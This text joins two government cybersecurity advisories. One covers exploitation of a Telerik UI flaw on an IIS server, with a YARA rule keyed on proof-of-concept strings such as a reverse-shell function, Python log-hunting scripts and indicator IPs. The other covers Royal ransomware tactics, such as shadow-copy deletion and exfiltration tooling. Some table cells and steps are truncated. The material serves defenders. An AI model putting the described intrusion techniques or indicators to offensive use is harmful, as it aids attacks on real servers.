The two files xesmartshell.tmp and SortVistaCompat have the capability to drop an Active Server Pages (ASPX) webshell—a base64 encoded text file small.txt decoded [T1140] as small.aspx [T1505.003]—to enumerate drives; to send, receive, and delete files; and to execute incoming commands. The webshell contains an interface for easily browsing files, directories, or drives on the system, and allows the user to upload or download files to any directory. No webshells were observed to be dropped on the target system, likely due to the abused service account having restrictive write permissions.
For more information on the DLLs, binaries, and webshell, see CISA MAR-10413062-1.v1 Telerik Vulnerability in U.S. Government IIS Server.
See Table 4 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping to the MITRE ATT&CK framework, see CISA’s Decider Tool and Best Practices for MITRE ATT&CK Mapping Guide.
Reconnaissance | ||
---|---|---|
Technique Title | ID | Use |
Active Scanning: Vulnerability Scanning | | Actors were observed conducting active scanning activity for vulnerable devices and specific ports. |
Initial Access | ||
Technique Title | ID | Use |
Exploit Public-Facing Application | | Actors exploited a known vulnerability in the Microsoft IIS server. |
Persistence | ||
Technique Title | ID | Use |
Server Software Component: Web Shell | | TA2’s malware dropped an ASPX webshell to enumerate drives; send, receive, and delete files; and execute commands. |
Defense Evasion | ||
Technique Title | ID | Use |
Masquerading: Match Legitimate Name or Location | | Actors leveraged the legitimate |
Process Injection: DLL Injection | | Actors loaded newly created DLLs into a running |
Indicator Removal: File Deletion | | TA1’s malware deleted files with ".dll" from the |
Indicator Removal: Timestomp | | Actors modified file time attributes to insert misleading creation dates. |
Decode Files | | The base64 encoded text file |
Discovery | ||
Technique Title | ID | Use |
File and Directory Discovery | | Actors enumerated the IIS server via OS fingerprinting, executed Windows processes, and collected network information. TA1’s malware enumerates systems, processes, files, and directories. |
System Network Configuration Discovery | | TA1’s malware gathers network parameters, including host name, domain name, DNS servers, NetBIOS ID, adapter information, IP address, subnet, gateway IP, and DHCP server. |
Command and Control | ||
Technique Title | ID | Use |
Ingress Tool Transfer | | TA1 and TA2 uploaded malicious DLL files (some masqueraded as PNG files) to the |
Non-Application Layer Protocol | | Actors used a non-application layer protocol (TCP) for |
CISA and authoring organizations recommend that organizations review the steps listed in this section and Table 4: Identified ATT&CK Techniques for Enterprise to detect similar activity on IIS servers.
CISA developed the following YARA rule from the base proof-of-concept code for CVE-2019-18935.[5] Note: Authoring organizations do not guarantee all malicious DLL files (if identified) will use the same code provided in this YARA rule.
rule CISA_10424018_01 {
meta:
Author = "CISA Code & Media Analysis"
Incident = "10424018"
Date = "2023-02-07"
Last_Modified = "20230216_1500"
Actor = "n/a"
Family = "n/a"
Capabilities = "n/a"
Malware_Type = "n/a"
Tool_Type = "n/a"
Description = "Detects open-source exploit samples"
SHA256 = "n/a"
strings:
$s0 = { 3D 20 7B 20 22 63 6D 22 2C 20 22 64 2E 65 22 2C }
$s1 = { 20 22 78 22 2C 20 22 65 22 20 7D 3B }
$s2 = { 52 65 76 65 72 73 65 53 68 65 6C 6C 28 29 }
$s3 = { 54 65 6C 65 72 69 6B 20 55 49 }
$s4 = { 66 69 6C 65 6E 61 6D 65 5F 6C 6F 63 61 6C }
$s5 = { 66 69 6C 65 6E 61 6D 65 5F 72 65 6D 6F 74 65 }
$s6 = { 41 55 43 69 70 68 65 72 2E 65 6E 63 72 79 70 74 }
$s7 = { 31 32 31 66 61 65 37 38 31 36 35 62 61 33 64 34 }
$s8 = { 43 6F 6E 6E 65 63 74 53 74 61 67 69 6E 67 53 65 72 76 65 72 28 29 }
$s9 = { 53 74 61 67 69 6E 67 53 65 72 76 65 72 53 6F 63 6B 65 74 }
$s10 = { 2A 62 75 66 66 65 72 20 3D 20 28 75 6E 73 69 67 6E 65 }
$s11 = { 28 2A 29 28 29 29 62 75 66 66 65 72 3B 0A 20 20 20 20 66 75 6E 63 28 29 3B }
$s12 = { 75 70 6C 6F 61 64 28 70 61 79 6C 6F 61 64 28 54 65 6D 70 54 61 72 67 65 74 }
$s13 = { 36 32 36 31 36 66 33 37 37 35 36 66 32 66 }
condition:
($s0 and $s1 and $s2) or ($s3 and $s4 and $s5 and $s6 and $s7) or ($s8 and $s9 and $s10 and $s11) or ($s12 and $s13)
}
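The rule above is written entirely as hex byte sequences, which makes it hard to read at a glance. The following Python script is an added example and is not part of the advisory or of CISA's tooling: it decodes each string so the analyst can see what the rule keys on, reproduces the rule's condition as a function, and evaluates it against an in-memory buffer or a file. It is a reading and testing aid for this one rule, not a substitute for running the rule under YARA.

```python
# Hex strings copied from rule CISA_10424018_01, keyed by their identifiers.
RULE_STRINGS = {
    "s0": "3D 20 7B 20 22 63 6D 22 2C 20 22 64 2E 65 22 2C",
    "s1": "20 22 78 22 2C 20 22 65 22 20 7D 3B",
    "s2": "52 65 76 65 72 73 65 53 68 65 6C 6C 28 29",
    "s3": "54 65 6C 65 72 69 6B 20 55 49",
    "s4": "66 69 6C 65 6E 61 6D 65 5F 6C 6F 63 61 6C",
    "s5": "66 69 6C 65 6E 61 6D 65 5F 72 65 6D 6F 74 65",
    "s6": "41 55 43 69 70 68 65 72 2E 65 6E 63 72 79 70 74",
    "s7": "31 32 31 66 61 65 37 38 31 36 35 62 61 33 64 34",
    "s8": "43 6F 6E 6E 65 63 74 53 74 61 67 69 6E 67 53 65 72 76 65 72 28 29",
    "s9": "53 74 61 67 69 6E 67 53 65 72 76 65 72 53 6F 63 6B 65 74",
    "s10": "2A 62 75 66 66 65 72 20 3D 20 28 75 6E 73 69 67 6E 65",
    "s11": "28 2A 29 28 29 29 62 75 66 66 65 72 3B 0A 20 20 20 20 66 75 6E 63 28 29 3B",
    "s12": "75 70 6C 6F 61 64 28 70 61 79 6C 6F 61 64 28 54 65 6D 70 54 61 72 67 65 74",
    "s13": "36 32 36 31 36 66 33 37 37 35 36 66 32 66",
}

# bytes.fromhex ignores the spaces between byte values.
PATTERNS = {name: bytes.fromhex(hexs) for name, hexs in RULE_STRINGS.items()}


def readable_strings():
    """Decode every pattern as text so the rule can be read by a human."""
    return {name: pattern.decode("latin-1") for name, pattern in PATTERNS.items()}


def string_matches(data):
    """Map each string identifier to whether its bytes occur in data."""
    return {name: pattern in data for name, pattern in PATTERNS.items()}


def rule_condition(m):
    """The condition clause of CISA_10424018_01, evaluated on a match map."""
    return ((m["s0"] and m["s1"] and m["s2"])
            or (m["s3"] and m["s4"] and m["s5"] and m["s6"] and m["s7"])
            or (m["s8"] and m["s9"] and m["s10"] and m["s11"])
            or (m["s12"] and m["s13"]))


def scan_buffer(data):
    """True when the rule would match the given bytes."""
    return rule_condition(string_matches(data))


def scan_file(path):
    """Read a file and report whether the rule matches it."""
    with open(path, "rb") as fh:
        return scan_buffer(fh.read())


if __name__ == "__main__":
    for name, text in readable_strings().items():
        print(f"${name} = {text!r}")
    # Constructed buffer containing only the second group of strings.
    sample = b"Telerik UI filename_local filename_remote AUCipher.encrypt 121fae78165ba3d4"
    print("rule matches sample:", scan_buffer(sample))
```

Reading the decoded strings shows why the advisory's note matters: each group corresponds to one recognizable fragment of the public proof-of-concept source (for example `$s3` is "Telerik UI" and `$s8` is "ConnectStagingServer()"), so a DLL built from different source will not carry them and the rule will not fire.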
CISA, FBI, and MS-ISAC recommend that organizations utilize a centralized log collection and monitoring capability, as well as implement or increase logging and forensic data retention. Longer retention policies improve the availability of data for forensic analysis and aid thorough identification of incident scope.
CISA, FBI, and MS-ISAC recommend that organizations use process monitoring—which provides visibility into file system and application process activity—to detect suspicious executable files running from the C:\Windows\Temp directory. Process monitoring via Windows Event Code 4688 will detect the legitimate w3wp.exe process running suspicious DLL files and other anomalous child processes. Note: Enabling this event may inundate security event logging. Use centralized log collection to prevent log rollover, increase log retention and archiving, and/or enable command line event logging.
Forensic analysis commonly identified the threat actors taking the following steps:
1. C:\Windows\Temp\1665890187.8690152.dll) by process w3wp.exe PID 6484.
2. w3wp.exe PID 6484.
3. w3wp.exe PID 6484 to 45.77.212[.]12 over port 443.
4. C:\Windows\System32\vcruntime140.dll (Windows C runtime library) to execute payload.
Steps 1 and 2 occur every time a malicious DLL file is created. In some cases, an ASP .NET temp file was created, but this may have indicated benign IIS server activity. Note: The Process ID (PID) used in this example is unique to this investigation and is not universal. IP address 45.77.212[.]12 correlates to TA1, but the pattern can be used as general practice to identify similar activity.
The following information was derived from artifact analysis and is provided to equip IT infrastructure defenders searching for similar activity on an IIS server. Several artifacts can be referenced to assist in determining if CVE-2019-18935 has been successfully exploited.
When this CVE is exploited, it uploads malicious DLL files to the C:\Windows\Temp directory. The malicious DLL file naming convention translates to the exact time the file was uploaded to the server.
The time is represented in a series of digits, known as Unix Epoch time. The files observed during this investigation contained two sets of digits separated by a period (.) before the DLL extension (.dll). Example: 1667206973.2270932.dll
Nearly all recovered files contain a series of 10 digits to the left of the period (.) and seven digits to the right. However, one file contained only five digits in the second set, which should be taken into consideration when writing regex patterns to search for the existence of these files. Example Regex: \d{10}\.\d{1,8}\.dll
These numbers can be copied and translated from digits into readable language with the month, day, year, hour, minute, and seconds displayed.
When investigating IIS logs, specific fields were searched for and captured during the time of each connection.
If the Unix Epoch time signature has been translated from a DLL filename, the logs can be searched around that time. If it has not been translated, the following will still work, but the query may take longer to run.
The four most important fields to identify this traffic are noted in the following table. These descriptions are sourced directly from Microsoft.[6]

| General Name | Field Name | Description |
|---|---|---|
| Method | cs-method | Requested action; for example, a GET method |
| URI Stem | cs-uri-stem | Universal Resource Identifier (URI), or target, of the action |
| URI Query | cs-uri-query | The query, if any, that the client was trying to perform; a URI query is necessary only for dynamic pages. |
| Protocol Status | sc-status | Hypertext Transfer Protocol (HTTP) or File Transfer Protocol (FTP) status code |

Note: Depending on how logs are collected and stored, the field names may not be an exact match; this should be taken into consideration when constructing queries. When ingesting logs into a security information and event management (SIEM) system, the final field names did not use a hyphen (-) but an underscore (_). Example: cs_method instead of cs-method

| Field Name | Artifact |
|---|---|
| cs-method | POST |
| cs-uri-stem | /Telerik.Web.UI.WebResource.axd |
| cs-uri-query | type=rau |
| sc-status | 200 and 302 |
When reviewing logs, two IIS events were observed with the same timestamp each time this CVE-2019-18935 was exploited. Both events contained the same information in the cs-method, cs-uri-stem, and cs-uri-query. One event had a sc-status of 200 and the other had a sc-status of 302.
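The filename decoding and the IIS log search described above, as an added Python example that is not part of the advisory: it decodes an epoch-named DLL filename (treating the digits after the period as the fractional second, which is an assumption), parses W3C-format IIS log lines into the underscore-style field names a SIEM would show, reports timestamps where a POST to /Telerik.Web.UI.WebResource.axd with type=rau produced both a 200 and a 302, and correlates those timestamps with the DLL upload times. The log lines, client addresses and DLL names below are constructed samples (documentation-range IPs; the advisory's 45.77.212[.]12 is not used). It assumes the IIS logs are written in UTC, which is the W3C logging default.

```python
import re
from datetime import datetime, timezone, timedelta

# Naming convention described above: ten epoch-second digits, a period,
# one to eight fractional digits, then .dll (the page's regex \d{10}\.\d{1,8}\.dll).
DLL_NAME_RE = re.compile(r"(?<![\d.])(\d{10})\.(\d{1,8})\.dll$", re.IGNORECASE)


def dll_name_to_utc(path):
    """Decode the upload time embedded in a Telerik-style temp DLL name.

    Returns an aware UTC datetime, or None when the name does not match.
    Assumption: the digits after the period are the fractional part of the same timestamp."""
    name = path.replace("\\", "/").rsplit("/", 1)[-1]
    m = DLL_NAME_RE.search(name)
    if not m:
        return None
    secs, frac = m.groups()
    micros = round(float("0." + frac) * 1_000_000)
    return datetime.fromtimestamp(int(secs), tz=timezone.utc) + timedelta(microseconds=micros)


def parse_iis_w3c(lines):
    """Parse W3C-format IIS log lines into dicts keyed by SIEM-style names (cs-method -> cs_method).
    The #Fields directive defines the columns; other # lines are skipped."""
    fields, records = [], []
    for line in lines:
        line = line.rstrip("\n")
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = [f.replace("-", "_").replace("(", "_").rstrip(")") for f in line.split()[1:]]
            continue
        if line.startswith("#"):
            continue
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # truncated or malformed row: skip rather than mis-key it
        records.append(dict(zip(fields, values)))
    return records


TELERIK_HANDLER = "/telerik.web.ui.webresource.axd"


def find_rau_events(records):
    """Group Telerik async-upload POSTs (type=rau) by timestamp, keeping the status codes and clients seen."""
    by_ts = {}
    for r in records:
        if r.get("cs_method", "").upper() != "POST":
            continue
        if not r.get("cs_uri_stem", "").lower().endswith(TELERIK_HANDLER):
            continue
        if "type=rau" not in r.get("cs_uri_query", "").lower():
            continue
        ts = datetime.strptime(r["date"] + " " + r["time"], "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)
        entry = by_ts.setdefault(ts, {"statuses": set(), "clients": set()})
        entry["statuses"].add(r.get("sc_status"))
        entry["clients"].add(r.get("c_ip"))
    return by_ts


def exploitation_candidates(by_ts):
    """Timestamps where the same upload request logged both a 200 and a 302, the pattern noted above."""
    return sorted(ts for ts, e in by_ts.items() if {"200", "302"} <= e["statuses"])


def correlate(dll_paths, by_ts, window=timedelta(seconds=5)):
    """Pair each decoded DLL upload time with type=rau activity inside +/- window.
    No timezone shift is applied: W3C IIS logs default to UTC, as does the epoch in the name."""
    out = []
    for p in dll_paths:
        t = dll_name_to_utc(p)
        if t is None:
            continue
        near = sorted(ts for ts in by_ts if abs(ts - t) <= window)
        out.append((p, t, near))
    return out


# Constructed sample log and DLL names (not taken from any investigation).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 8.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2022-10-16 03:16:27 10.0.0.5 POST /Telerik.Web.UI.WebResource.axd type=rau 443 - 203.0.113.9 Mozilla/5.0 200 0 0 312
2022-10-16 03:16:27 10.0.0.5 POST /Telerik.Web.UI.WebResource.axd type=rau 443 - 203.0.113.9 Mozilla/5.0 302 0 0 15
2022-10-16 03:18:01 10.0.0.5 GET /Default.aspx - 443 - 198.51.100.7 Mozilla/5.0 200 0 0 40
2022-10-16 04:10:12 10.0.0.5 POST /Telerik.Web.UI.WebResource.axd type=rau 443 - 198.51.100.7 Mozilla/5.0 200 0 0 90
"""
SAMPLE_DLLS = [r"C:\Windows\Temp\1665890187.8690152.dll", r"C:\Windows\Temp\legit.dll"]

if __name__ == "__main__":
    events = find_rau_events(parse_iis_w3c(SAMPLE_LOG.splitlines()))
    for ts in exploitation_candidates(events):
        print(f"{ts:%Y-%m-%d %H:%M:%S} UTC: 200+302 on type=rau from {sorted(events[ts]['clients'])}")
    for path, t, near in correlate(SAMPLE_DLLS, events):
        print(f"{path} uploaded {t.isoformat()} -> matching IIS hits: {[n.isoformat() for n in near]}")
```

A lone 200 on type=rau (the 04:10:12 line) is reported as activity but not as an exploitation candidate; a legitimate RadAsyncUpload client produces those, so the 200/302 pair plus a matching DLL in C:\Windows\Temp is the stronger signal.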
Kroll Artifact Parser and Extractor (KAPE), a forensic artifact collector and parser, was used to extract the Windows event logs from a backup image of the compromised IIS server. All field names refer to the labels provided via KAPE exports. The strings are of value and can be used to locate other artifacts if different tools are used. Note: The payload data in the following table has been shortened to only necessary strings to obscure and protect victim information.
| EventID | Payload |
|---|---|
| 1309 | 3005, An unhandled exception has occurred[*redacted*]w3wp.exe[*redacted*]InvalidCastException, Unable to cast object of type 'System.Configuration.Install.AssemblyInstaller' to type 'Telerik.Web.UI.IAsyncUploadConfiguration'.\n at Telerik.Web.UI.AsyncUploadHandler.GetConfiguration(String rawData)\n at Telerik.Web.UI.AsyncUploadHandler.EnsureSetup()\n at Telerik.Web.UI.AsyncUploadHandler.ProcessRequest(HttpContext context)\n at Telerik.Web.UI.HandlerRouter.ProcessHandler(String handlerKey, HttpContext context)\n at Telerik.Web.UI.WebResource.ProcessRequest(HttpContext context)\n at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()\n at System.Web.HttpApplication.ExecuteStepImpl(IExecutionStep step)\n at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)\n\n, [*redacted*]/Telerik.Web.UI.WebResource.axd?type=rau, /Telerik.Web.UI.WebResource.axd, [*redacted*], False, [*redacted*], 15, [*redacted*], False, at Telerik.Web.UI.AsyncUploadHandler.GetConfiguration(String rawData)\n at Telerik.Web.UI.AsyncUploadHandler.EnsureSetup()\n at Telerik.Web.UI.AsyncUploadHandler.ProcessRequest(HttpContext context)\n at Telerik.Web.UI.HandlerRouter.ProcessHandler(String handlerKey, HttpContext context)\n at Telerik.Web.UI.WebResource.ProcessRequest(HttpContext context)\n at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()\n at System.Web.HttpApplication.ExecuteStepImpl(IExecutionStep step)\n at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)\n","Binary":""}} |
Authoring organizations recommend looking for the following key strings in the payload:

- w3wp.exe: This is the parent process that executes the code inside the malicious DLLs.
- System.Configuration.Install.AssemblyInstaller: Figure 1 is from the creator's GitHub repo,[7] where the string can be observed in the code. As presented by Bishop Fox and proven during the authoring organizations' investigation of IIS server logs, an exception does not mean that the exploit failed, but more likely that it executed successfully.[3]

If a WerFault crash report was written, the Windows Application event log may contain evidence of this, even if the DLLs have been removed from the system as part of a cleanup effort by the threat actors.
| EventID | ExecutableInfo | MapDescription | Payload |
|---|---|---|---|
| 1000 | w3wp.exe; 1664175639.65719.dll; c:\windows\system32\inetsrv\w3wp.exe; C:\Windows\Temp\1664175639.65719.dll | Application Error | {"EventData":{"Data":"w3wp.exe, 8.5.9600.16384, 5215df96, 1664175639.65719.dll, 0.0.0.0, 63314d94, c00000fd, 00000000000016f8, 1708, 01d8d0a5f84af443, c:\windows\system32\inetsrv\w3wp.exe, C:\Windows\Temp\1664175639.65719.dll, eed89eeb-3d68-11ed-817c-005056990ed7","Binary":""}} |
| 1001 | w3wp.exe; 1664175639.65719.dll; C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_w3wp.exe (three report-queue paths, truncated in the export) | Application Crash | {"EventData":{"Data":"0, APPCRASH, Not available, 0, w3wp.exe, 8.5.9600.16384, 5215df96, 1664175639.65719.dll, 0.0.0.0, 63314d94, c00000fd, 00000000000016f8, \nC:\Windows\Temp\WERE3F6.tmp.appcompat.txt\nC:\Windows\Temp\WERE639.tmp.WERInternalMetadata.xml\nC:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_w3wp.exe_d538da447d49df5862c37684118d0c25c2eff_9e3fd63b_cab_0c3ee656\memory.hdmp\nC:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_w3wp.exe_d538da447d49df5862c37684118d0c25c2eff_9e3fd63b_cab_0c3ee656\triagedump.dmp, C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_w3wp.exe_d538da447d49df5862c37684118d0c25c2eff_9e3fd63b_cab_0c3ee656, 0, eed89eeb-3d68-11ed-817c-005056990ed7, 4","Binary":""}} |
The EventID field maps to Windows EventIDs for an easy filter. Users can leverage these Windows EventIDs to find a malicious DLL with a Unix Epoch time-based name inside the C:\Windows\Temp directory.
Depending on how log analysis is performed, various filters can be used. However, if regex is available, the example regex listed above can be reused to match the Unix Epoch timestamp convention and assist in filtering.
When evidence of malicious DLLs is found, reverse engineering will need to be conducted to fully understand what actions occur, as the malicious files could do nearly anything. Windows security event logs, as well as Windows PowerShell logs, may provide insight into what actions the DLLs are taking. CISA and authoring organizations recommend the following process:

- Search for w3wp.exe in Windows security event logs (e.g., Windows EventID 4688 New Process created).

If the Trellix XDR Platform is deployed in the environment and a standard HX triage audit is completed in a timely manner after the suspected use of CVE-2019-18935, an organization can search for file write events from known web processes. This will identify the executables written by the web server process. CISA and authoring organizations specifically recommend searching for the following field value pair:

| Field | Value Begins With |
|---|---|
| TextAtLowestOffset | MZ |
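The Application log and file-write checks above, as an added Python example that is not the advisory's or any vendor's tooling: it cuts the Data string out of a KAPE-style Payload column, names the fields of an EventID 1000 record, pulls every epoch-named DLL mentioned in 1000 and 1001 events, and applies the "MZ" first-bytes test to file writes attributed to w3wp.exe. The EventID 1000 and 1001 payloads are the ones from the table above (the 1001 payload shortened); the benign crash event, the file-write records and their leading bytes are constructed. Treating the faulting-process-id field as hexadecimal follows the way Event 1000 renders it ("Faulting process id: 0x...").

```python
import re
from datetime import datetime, timezone

# Epoch-named DLL convention from the hunting notes above; matches the bare name
# wherever it appears, inside a full path or on its own.
EPOCH_DLL_RE = re.compile(r"(?<![\w.])\d{10}\.\d{1,8}\.dll", re.IGNORECASE)


def event_data(payload):
    """Return the EventData.Data string from a KAPE-style Payload column.
    These exports carry Windows paths with single backslashes, which is not strict JSON,
    so the field is cut out with a regex instead of json.loads()."""
    m = re.search(r'"Data":"(.*?)","Binary"', payload, re.S)
    if not m:
        raise ValueError("no EventData.Data in payload")
    return m.group(1)


def find_epoch_dlls(payload):
    """Set of epoch-named DLL filenames mentioned anywhere in the payload (EventID 1000 and 1001 alike)."""
    return set(EPOCH_DLL_RE.findall(payload))


def epoch_dll_time(name):
    """UTC upload time encoded in the ten leading digits of an epoch-named DLL."""
    return datetime.fromtimestamp(int(name.split(".", 1)[0]), tz=timezone.utc)


# Field order of the Data string Windows Error Reporting writes for EventID 1000.
EVENT_1000_FIELDS = ("faulting_app", "app_version", "app_timestamp", "module", "module_version",
                     "module_timestamp", "exception_code", "fault_offset", "pid_hex",
                     "app_start_time", "app_path", "module_path", "report_id")


def parse_event_1000(payload):
    """Name the comma-separated fields of an EventID 1000 record.
    The process id is shown as 0x... in the rendered event, i.e. the raw field is hexadecimal."""
    parts = [p.strip() for p in event_data(payload).split(",")]
    if len(parts) != len(EVENT_1000_FIELDS):
        raise ValueError(f"unexpected field count {len(parts)} for EventID 1000")
    rec = dict(zip(EVENT_1000_FIELDS, parts))
    rec["pid"] = int(rec["pid_hex"], 16)
    return rec


def is_pe_image(first_bytes):
    """The TextAtLowestOffset check from the table above: PE images begin with 'MZ'."""
    return first_bytes[:2] == b"MZ"


def triage(events, file_writes, web_process="w3wp.exe"):
    """events: rows with EventID and Payload (KAPE export style).
    file_writes: (writing_process, path, first_bytes), as an EDR file-write audit would provide.
    Returns one finding per crash event naming an epoch DLL and per PE image written by the web process."""
    findings = []
    for ev in events:
        dlls = find_epoch_dlls(ev["Payload"])
        if not dlls:
            continue
        detail = ""
        if ev["EventID"] == 1000:
            rec = parse_event_1000(ev["Payload"])
            if rec["faulting_app"].lower() != web_process:
                continue
            detail = f" faulting pid {rec['pid']} module {rec['module_path']}"
        for name in sorted(dlls):
            findings.append(f"EventID {ev['EventID']}: {name} (uploaded {epoch_dll_time(name):%Y-%m-%d %H:%M:%S} UTC){detail}")
    for writer, path, head in file_writes:
        if writer.lower() == web_process and is_pe_image(head):
            findings.append(f"PE image written by {writer}: {path}")
    return findings


# Payloads of the EventID 1000 and 1001 records shown in the table above (1001 shortened).
EVENT_1000_PAYLOAD = r'{"EventData":{"Data":"w3wp.exe, 8.5.9600.16384, 5215df96, 1664175639.65719.dll, 0.0.0.0, 63314d94, c00000fd, 00000000000016f8, 1708, 01d8d0a5f84af443, c:\windows\system32\inetsrv\w3wp.exe, C:\Windows\Temp\1664175639.65719.dll, eed89eeb-3d68-11ed-817c-005056990ed7","Binary":""}}'
EVENT_1001_PAYLOAD = r'{"EventData":{"Data":"0, APPCRASH, Not available, 0, w3wp.exe, 8.5.9600.16384, 5215df96, 1664175639.65719.dll, 0.0.0.0, 63314d94, c00000fd, 00000000000016f8, \nC:\Windows\Temp\WERE3F6.tmp.appcompat.txt\nC:\Windows\Temp\WERE639.tmp.WERInternalMetadata.xml, C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_w3wp.exe_d538da447d49df5862c37684118d0c25c2eff_9e3fd63b_cab_0c3ee656, 0, eed89eeb-3d68-11ed-817c-005056990ed7, 4","Binary":""}}'

# Constructed rows: a benign crash with no epoch DLL, plus EDR-style file-write records.
SAMPLE_EVENTS = [
    {"EventID": 1000, "Payload": EVENT_1000_PAYLOAD},
    {"EventID": 1001, "Payload": EVENT_1001_PAYLOAD},
    {"EventID": 1000, "Payload": r'{"EventData":{"Data":"notepad.exe, 10.0.19041.1, 1, ntdll.dll, 10.0.19041.1, 1, c0000005, 0, 2a4, 0, C:\Windows\System32\notepad.exe, C:\Windows\System32\ntdll.dll, 00000000-0000-0000-0000-000000000000","Binary":""}}'},
]
SAMPLE_WRITES = [
    ("w3wp.exe", r"C:\Windows\Temp\1664175639.65719.dll", b"MZ\x90\x00\x03\x00"),
    ("w3wp.exe", r"C:\inetpub\temp\upload.tmp", b"<%@ Page Language"),
    ("explorer.exe", r"C:\Users\user\Downloads\tool.exe", b"MZ\x90\x00"),
]

if __name__ == "__main__":
    for line in triage(SAMPLE_EVENTS, SAMPLE_WRITES):
        print(line)
```

The 1001 record carries only the bare module name, not its path, which is why the DLL search runs over the whole payload rather than a fixed field; a crash is also not required for a successful exploit, so an absence of 1000/1001 events says nothing on its own.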
Note: These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
In addition to applying mitigations, CISA, FBI, and MS-ISAC recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA and co-sealers recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
CISA, FBI, and MS-ISAC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
[1] Telerik: Exploiting .NET JavaScriptSerializer Deserialization (CVE-2019-18935)
[2] ACSC Advisory 2020-004
[3] Bishop Fox CVE-2019-18935: Remote Code Execution via Insecure Deserialization in Telerik UI
[4] Volexity Threat Research: XE Group
[5] GitHub: Proof-of-Concept Exploit for CVE-2019-18935
[6] Microsoft: Configure Logging in IIS
[7] GitHub: CVE-2019-18935
Google’s Threat Analysis Group (TAG) contributed to this CSA.
Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
Actions to take today to mitigate cyber threats from ransomware:
The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint CSA to disseminate known Royal ransomware IOCs and TTPs identified through FBI threat response activities as recently as January 2023.
Since approximately September 2022, cyber criminals have compromised U.S. and international organizations with a Royal ransomware variant. FBI and CISA believe this variant, which uses its own custom-made file encryption program, evolved from earlier iterations that used "Zeon" as a loader. After gaining access to victims' networks, Royal actors disable antivirus software and exfiltrate large amounts of data before ultimately deploying the ransomware and encrypting the systems. Royal actors have made ransom demands ranging from approximately $1 million to $11 million USD in Bitcoin. In observed incidents, Royal actors do not include ransom amounts and payment instructions as part of the initial ransom note. Instead, the note, which appears after encryption, requires victims to directly interact with the threat actor via a .onion URL (reachable through the Tor browser). Royal actors have targeted numerous critical infrastructure sectors including, but not limited to, Manufacturing, Communications, Healthcare and Public Healthcare (HPH), and Education.
FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 12. See MITRE ATT&CK for Enterprise for all referenced tactics and techniques.
Royal ransomware uses a unique partial encryption approach that allows the threat actor to choose a specific percentage of data in a file to encrypt. This approach allows the actor to lower the encryption percentage for larger files, which helps evade detection.[1] In addition to encrypting files, Royal actors also engage in double extortion tactics in which they threaten to publicly release the encrypted data if the victim does not pay the ransom.
Royal actors gain initial access to victim networks in a number of ways including:
Once Royal actors gain access to the network, they communicate with command and control (C2) infrastructure and download multiple tools [T1105]. Legitimate Windows software is repurposed by Royal operators to strengthen their foothold in the victim's network. Ransomware operators often use open-source projects to aid their intrusion activities; Royal operators have recently been observed using Chisel, a tunneling tool transported over HTTP and secured via SSH [T1572], to communicate with their C2 infrastructure. FBI has observed multiple Qakbot C2s used in Royal ransomware attacks, but has not yet determined whether Royal ransomware exclusively uses Qakbot C2s.
Royal actors often use RDP to move laterally across the network [T1021.001]. The Microsoft Sysinternals tool PsExec has also been used to aid lateral movement. FBI has observed Royal actors using remote monitoring and management (RMM) software, such as AnyDesk, LogMeIn, and Atera, for persistence in the victim's network [T1133]. In some instances, the actors moved laterally to the domain controller. In one confirmed case, the actors used a legitimate admin account to remotely log on to the domain controller [T1078]. Once on the domain controller, the threat actor deactivated antivirus protections [T1562.001] by modifying Group Policy Objects [T1484.001].
Royal actors exfiltrate data from victim networks by repurposing legitimate cyber pentesting tools, such as Cobalt Strike, and malware tools and derivatives, such as Ursnif/Gozi, for data aggregation and exfiltration. According to third-party reporting, Royal actors’ first hop in exfiltration and other operations is usually a U.S. IP address.
Note: In reference to Cobalt Strike and other tools mentioned above, a tool repository used by Royal was identified at IP: 94.232.41[.]105 in December 2022.
Before starting the encryption process, Royal actors run vssadmin.exe to delete shadow copies and prevent system recovery.[1] FBI has found numerous batch (.bat) files on impacted systems, which are typically transferred as an encrypted 7zip file. Batch files create a new admin user [T1078.002], force a group policy update, set pertinent registry keys to auto-extract [T1119] and execute the ransomware, monitor the encryption process, and delete files upon completion, including the Application, System, and Security event logs [T1070.001].
Malicious files have been found in victim networks in the following directories:

- C:\Temp\
- C:\Users\<user>\AppData\Roaming\
- C:\Users\<user>\
- C:\ProgramData\
